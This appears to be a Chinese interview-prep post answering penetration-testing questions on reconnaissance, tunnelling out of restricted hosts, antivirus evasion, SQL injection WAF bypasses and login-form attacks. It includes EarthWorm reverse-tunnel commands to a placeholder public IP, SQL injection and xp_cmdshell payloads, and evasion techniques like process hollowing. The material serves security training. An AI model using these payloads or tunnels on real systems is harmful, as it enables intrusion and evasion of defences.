2025年渗透测试面试题总结-30(题目+回答)
安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
一、邮箱类型判断
二、真实IP确认方法
三、不出网机器上线CS
四、代理工具与杀软对抗
五、免杀技术核心思路
六、SQL注入Bypass技巧
七、红队HW信息收集
八、Whois信息内容
九、登录框攻击面
十、Python/PHP在渗透中的用途
二百五十一、如何判断邮箱类型二百五十二、如何确定你拿到的就是真实ip二百五十三、机器不出网如何上线到cs(不出网的机器是拿到wenshell的机器)二百五十四、走代理用哪些工具,遇到杀软怎么办二百五十五、如何免杀二百五十六、sql注入bypass有哪些(尽可能多说)二百五十七、平常红队hw信息收集方式有哪些二百五十八、whois 收集的信息包括哪些二百五十九、给一个登录框能想到哪些利用方式二百六十、平常开发经常用python 和php做什么
一、邮箱类型判断
- 域名分析
- 企业邮箱:域名与公司官网一致(如
user@company.com
)- 公共邮箱:
@gmail.com
、@qq.com
等- 自建邮箱:MX记录指向私有IP或非知名邮件服务商
- SMTP响应特征
- 连接25/465端口,通过
HELO
命令返回服务标识(如Exchange、Postfix)- 邮件头解析
- 检查
Received:
字段中的服务器路径和中间件类型(如X-Mailer: Sendmail
)
二、真实IP确认方法
- 网络层验证
- 使用
traceroute
观察最后一跳IP- 检查TCP/IP数据包TTL值是否与宣称系统匹配
- 协议级检测
- HTTP请求:对比
X-Forwarded-For
与TCP连接IP- SSL证书关联:扫描IP的443端口证书是否绑定目标域名
- 第三方平台验证
- 通过Shodan/Censys搜索IP历史绑定记录
- 利用CDN识别工具(如
cdnchecker.com
)
三、不出网机器上线CS
前提:已获取Webshell但目标无外网连接
mermaidgraph LR A[Webshell] --> B[上传代理工具] B --> C[建立内网隧道] C --> D[通过可控节点转发流量]
- 工具选择
- reGeorg+Proxychains(HTTP隧道)
- EarthWorm(SOCKS5反向代理)
- 关键步骤
- 在可控公网服务器启动监听(
ew -s rcsocks -l 1080 -e 8888
)- 从不出网机器反向连接:
ew -s rssocks -d <公网IP> -e 8888
- 配置CS监听器指向本地SOCKS代理
四、代理工具与杀软对抗
代理类型 推荐工具 免杀策略 HTTP隧道 reGeorg, Tiny 自定义响应头+流量AES加密 SOCKS5 EarthWorm, Neo-reGeorg 协议混淆(如伪装成SSL流量) DNS隧道 dnscat2 使用TXT记录+长域名分割传输 对抗要点:
- 内存加密(如Cobalt Strike的
Secure Profile
)- 流量特征修改(JA3指纹伪造)
- 进程注入(注入到
svchost.exe
等系统进程)
五、免杀技术核心思路
- 代码层面
- Shellcode加密(AES/RC4)+ 运行时解密
- API动态调用(通过Hash检索函数地址)
- 加载方式
- 进程空洞(Process Hollowing)
- 反射型DLL注入
- 行为伪装
- 签名劫持(LOLBins)
- 合法进程注入(如利用
msbuild.exe
执行C#载荷)
六、SQL注入Bypass技巧
WAF绕过类:
sql/*!50000SELECT*/ 1,2,3 -- MySQL内联注释 SEL%0bECT 1,2,3 -- 空白符分割(%0b为垂直制表符) UNION ALL SELECT 1,2,3 -- 等价替换
过滤绕过类:
- 大小写/双写:
uNIoN sELecT
→uniUNIONon selSELECTect
- 编码转换:
CHAR(65,66,67)
代替'ABC'
- 参数污染:
id=1&id=2' and 1=1--
数据库特性利用:
- MySQL:
/*!50000CONCAT*/(@@version)
- MSSQL:
DECLARE @a VARCHAR(50)=%27EXEC master..xp_cmdshell%27; EXEC(@a+%27whoami%27)
共整理37种Bypass手法(篇幅限制未全列),重点:理解WAF解析差异+数据库特性
七、红队HW信息收集
- 被动情报
- Whois/备案查询 → 关联子公司和IP段
- GitHub敏感信息扫描(API密钥、内部文档)
- 主动探测
- 全端口扫描(Masscan)+ 服务识别(Nmap -sV)
- 子域名爆破(
*.target.com
)- 社会工程
- 员工领英信息 → 制作钓鱼字典
- 公开招标文件 → 获取内部系统名称
八、Whois信息内容
json{ "注册人": "姓名/组织(可能匿名)", "联系方式": "邮箱/电话(需验证)", "域名服务器": "NS1.xxx.com, NS2.xxx.com", "注册日期": "2020-01-01", "过期日期": "2025-12-31", "IP关联": "历史解析记录(通过APNIC数据库反查)" }
注意:GDPR可能导致欧洲域名信息隐藏
九、登录框攻击面
- 认证绕过
- SQL注入:
admin'--
- Cookie篡改:
admin=1; role=superuser
- 凭证相关
- 暴力破解(Burp Intruder)
- 密码重置逻辑漏洞(如修改接收邮箱)
- 后端漏洞
- LDAP注入:
*)(&
- JWT密钥破解(jwt_tool)
- 前端风险
- XSS存储型 → 窃取Cookie
- CSRF → 强制修改密码
十、Python/PHP在渗透中的用途
语言 典型场景 常用库/框架 Python 漏洞PoC编写(Requests+BeautifulSoup) Scapy(流量伪造)、PyInstaller(打包) C2开发(Flask/Socket) Pwntools(二进制利用) PHP Webshell编写(蚁剑/冰蝎连接) Guzzle(HTTP代理穿透) CMS漏洞利用(WordPress插件审计) PHP-FFI(调用系统API) 案例:
- Python自动化信息收集:
subprocess
调用Nmap+解析XML报告- PHP内存马:通过
php://input
注入恶意路由到正常应用